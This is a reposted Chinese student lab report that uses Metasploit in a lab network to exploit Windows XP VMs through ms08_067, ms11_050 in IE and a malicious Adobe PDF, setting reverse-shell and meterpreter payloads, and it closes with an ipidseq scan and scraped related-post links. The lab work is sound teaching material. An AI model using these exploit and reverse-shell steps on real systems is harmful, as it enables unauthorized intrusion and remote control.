20155305《网络对抗》MSF基础应用

最新推荐文章于 2024-08-08 16:15:46 发布
最新推荐文章于 2024-08-08 16:15:46 发布
阅读量169 收藏
点赞数
文章标签: 运维 shell 网络
原文链接:http://www.cnblogs.com/20155305ql/p/8820504.html
版权

20155305《网络对抗》MSF基础应用

实验过程

实验系统

  • 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.108
  • 靶机2:Windows XP Professional SP3 简体中文,IP地址:192.168.1.113
  • windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多。
  • Kali IP地址:192.168.1.105

1、主动攻击:ms08_067

  • 使用靶机1和Kali
    msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:

1071527-20180413185512564-1784109148.png

  • use exploit/windows/smb/ms08_067_netapi使用该模块:

1071527-20180413185652665-1968765138.png

  • show targets查看可以被攻击的靶机的操作系统型号:

1071527-20180414174042575-1455827082.png

  • show payloads查看可以供我们使用的攻击载荷:

1071527-20180414174205600-1749212926.png

  • 从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

1071527-20180414175307410-1272952996.png

  • show options查看需要设置的参数:

1071527-20180414175439903-1469758737.png

  • 这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置:

1071527-20180414194444185-1499489385.png

  • 设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP2,所以选择10)

1071527-20180414211007493-1113918504.png

  • show options确认需要设置的参数是否已经设置好:

1071527-20180414211032251-824532046.png

  • 确认参数设置无误后,用exploit指令开始攻击:

1071527-20180414211102248-1615666845.png

  • 攻击成功后会获取靶机的shell,可以对其进行操作:

1071527-20180414211143683-509328071.png

2、针对浏览器的攻击:ms11_050

  • 使用靶机2和Kali(一开始用自己的最后会有问题,所以换了老师之前的kali)

search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:

1071527-20180414230256477-949972464.png

  • info查看该模块的信息(这个指令相当于show targetsshow options等的集合版):

基本信息:

1071527-20180414230326978-745949903.png

  • targets信息:

1071527-20180414230914702-98304215.png

  • options信息:

1071527-20180414230940733-157722659.png

  • set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。

1071527-20180414231203883-1255595288.png

show options确认需要设置的参数是否已经设置好:

1071527-20180414231231716-1883883270.png

  • 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

1071527-20180415170009073-1431561234.png

  • 在靶机IE上输入该网址:

1071527-20180414231516606-1162006599.png

  • kali中显示session 1已经创建,并显示其会话ID:

1071527-20180415121614169-94746291.png

  • 输入sessions -i 1,成功获取靶机的shell,可以对其进行操作:

1071527-20180415121622653-692336514.png

1071527-20180415121628674-1692600288.jpg

3、针对客户端的攻击:adobe_toolbutton

  • 使用靶机1和Kali

search adobe查询一下针对该漏洞的攻击模块:

1071527-20180416183201315-894961445.png

  • 选择一个模块并使用该模块:

1071527-20180416183832026-928680496.png

  • show targets查看可以被攻击的靶机的操作系统型号:

1071527-20180416183905865-485473996.png

  • 设置payload攻击载荷,命令set payload windows/meterpreter/reverse_tcp

1071527-20180416184241952-1403374987.png

  • show options查看需要设置的参数:

1071527-20180416184433586-605995897.png

  • 设置相应参数,实施exploit攻击,发现在/root/.msf4/local/目录下成功生成了一个qiaolei05.pdf文件:

1071527-20180416184921219-793990512.png

  • 这个时候你可能在你的kali中找不到这个pdf文件,那么打开文件夹的隐藏文件显示就可以找到啦

1071527-20180416185126899-89465984.png

  • 将pdf文件粘贴到靶机win xp

1071527-20180416185429764-1212118660.png

  • 在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp,再设置IP以及端口

1071527-20180416190046748-762730703.png

  • 在靶机上打开刚刚那个pdf文件(这个时候可能xp没有adobe就需要下载一波,地址呢可以到这里下载),可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

1071527-20180416204738431-1424812188.png

4、成功应用任何一个辅助模块:ipidseq

  • ipidseq
功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。

拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为`Incremental!`的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。

TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。
  • show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:

1071527-20180416215549145-1844157251.png

1071527-20180416220024705-1389150232.png

  • 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。

1071527-20180416220454731-2131085743.png

1071527-20180416220706370-576963155.png

  • 也可以对指定网段的主机进行扫描:

1071527-20180416220845833-1346267385.png

1071527-20180416231618199-2001152434.png

实验总结和收获

  • 讲道理感觉最难就是虚拟机了,大概下载了十个镜像做实验,就大概屡战屡改,xp的简体中文,台湾版,繁体版都有下载过,最后还是用了简体中文,难得的是居然用的还不错,虽然又在里面下了一些别的需要用的,比如adobe reader。至于英文版呢,因为正好下载英文版的时候网速奇差无比,直接就没试验了,虽然感觉学长学姐大多用的全是英文版english。
  • 第三个pdf我还试了试传进了主机,结果一传进来就被查杀了,还看到一个很新鲜的病毒词汇,脚本病毒,和以前的后门被查杀还不一样呢哈哈。
  • 实验确实有意思,体会了黑客的感觉,虽然都是以前的xp版本,但还是收获颇丰,而且蛮喜欢这种学知识的方式。

转载于:https://www.cnblogs.com/20155305ql/p/8820504.html

weixin_30827565
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 361
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
msf简单运用基础
12-16
文中通过ping命令验证了网络连通性,这是进行后续渗透测试的基础。 ### 二、MSF框架的初步使用 #### 1. 扫描目标系统 - **db_nmap**: 这是MSF中调用Nmap工具的一种方式,用于获取目标主机的操作系统类型、开放端口...
通信与网络中的MSF基于组件的业务框架
11-14
MSF定义的基于组件的业务框架如图所示。该框架包括业务组件和业务代理两大主要功能。业务组件是捆绑或集成在一起的多个业务对象,用来创建销售给用户的业务,有三种类型的业务组件。   图 MSF基于组件的业务框架   (1)应用层业务组件(ASC)   这些组件通常与应用服务器有关,通过信令访问,由一系列输入输出交互准则定义。例如,基于SIP的业务交互中,相关ASC必须理解发送或接收的不同SIP消息中特定的参数。   (2)媒体服务组件(MSC)   MSC用于与媒体通路的交互,MSC大多与媒体服务器有关,包括一些功能如文本到语音的转化、交互式语音识别系统、会议桥等。   (3)数据
2017-2018-2 20155230《网络对抗技术》实验6:信息搜集与漏洞扫描
aohuang6078的博客
05-07 214
实践过程记录 信息搜集 1、whois查询 以百度官网的网址为例,使用whois查询域名注册信息(进行whois查询时去掉www等前缀,因为注册域名时通常会注册一个上层域名,子域名由自身的域名服务器管理,在whois数据库中可能查询不到) 从下图可以得到3R注册信息,包括注册人的名字、组织、城市等信息。 2、nslookup,dig查询 先以百度官网为例进行dig查询 可以使...
20155320《网络对抗MSF基础应用
weixin_30799995的博客
04-28 105
20155320《网络对抗MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode 于exploit,我觉得exploit是利用一些工具和方法,通过一些渠道知道某些操作系统存在的漏洞并对漏洞资料进行分析研究,从而获取到了被攻击者计算机的相关信息,或者是可以进行提权等超级用户的操作 payload 感觉就是一段代码,通过运行这个代码可以实现漏洞攻击 enc...
20155305网络对抗》恶意代码分析
weixin_30654583的博客
04-10 89
20155305网络对抗》恶意代码分析 实验过程 1、计划任务监控 在C盘根目录下建立一个netstatlog.bat文件(先把后缀设为txt,保存好内容后记得把后缀改为bat),内容如下: date /t >> c:\netstatlog.txt time /t >> c:\netstatlog.txt netstat -bn >> c:\netstatlo...
20155218《网络对抗MSF基础应用
04-17 126
20155218《网络对抗MSF基础应用 实验过程 1、一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞; show target 查看可以攻击的目标主机类型; show payloads查看可以选择的攻击载荷,看了一下其等级全为normal,从中找到一个可用的攻击载荷 generic/shell_reverse_tcp 用op...
20155304《网络对抗MSF基础应用
05-03 195
20155304《网络对抗MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1一个主动攻击实践,如ms08_067; 1.2 一个针对浏览器的攻击,如ms11_050; 1.3 一个针对客户端的攻击,如Adobe; 1.4 成功应用任何一个辅助模块。 1.1主动攻击:ms08_067 使用靶机1和Kali 先...
20145327 《网络对抗MSF基础应用
dengnaxun1606的博客
04-15 127
20145327 《网络对抗MSF基础应用 主动攻击ms08_067 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版) kali ip地址:192.168.43.54 windows xp sp3 ip地址:192.168.43.56 ping通: MS08_067远程漏洞攻击实践:Shell 1.开启msfconsole. 2.输入命令search ...
20155311《网络对抗MSF基础应用
weixin_30617695的博客
04-26 83
20155311《网络对抗MSF基础应用 实验过程 实验系统 靶机1:Windows XP Professional SP2 ,IP地址:192.168.136.129 靶机2:Windows XP vivian SP3 简体中文,IP地址:192.168.136.130 Kali IP地址:192.168.136.128 1、主动攻击:ms08_067 •使用靶机1和Kali 先...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
74-74.渗透测试-MSF核心模块.mp4
05-10
74-74.渗透测试-MSF核心模块.mp4
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
Linux磁盘管理与文件系统(一):磁盘、MBR与分区和文件系统
最新发布
shyuu的博客
08-08 973
Linux磁盘管理与文件结构(一),理论讲解磁盘结构、MBR与分区和文件系统
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
B6665X的博客
08-06 408
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
【HAProxy】haproxy七层代理
m0_64570996的博客
08-08 976
超级超级超级详细哦哦!!!!!
K8S Ingress 常用配置
小五
08-08 1075
本次所有操作都是在K8S 1.26.14 上面操作,太老的版本不知道会不会有问题。更多 Ingress 配置请查看ingress-nginx 官网定义服务托管页面后段程序(为了演示使用 nginx 部署)。部署自定义页面 配置文件。
尚硅谷谷粒商城项目笔记——三、安装docker【电脑CPU:AMD】
B6665X的博客
08-06 924
尚硅谷谷粒商城项目笔记——三、安装docker 电脑CPU:AMD
MSF基础与团队模型详解:原则、应用与CMMI比较
在实际课程中,MSF的培训通常会通过案例研究、讨论和实践活动来深入讲解这些概念,并鼓励参与者将理论应用到实际工作中。通过讨论,学员可以理解一个优秀的项目团队应具备的特点,如良好的沟通、明确的目标导向、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值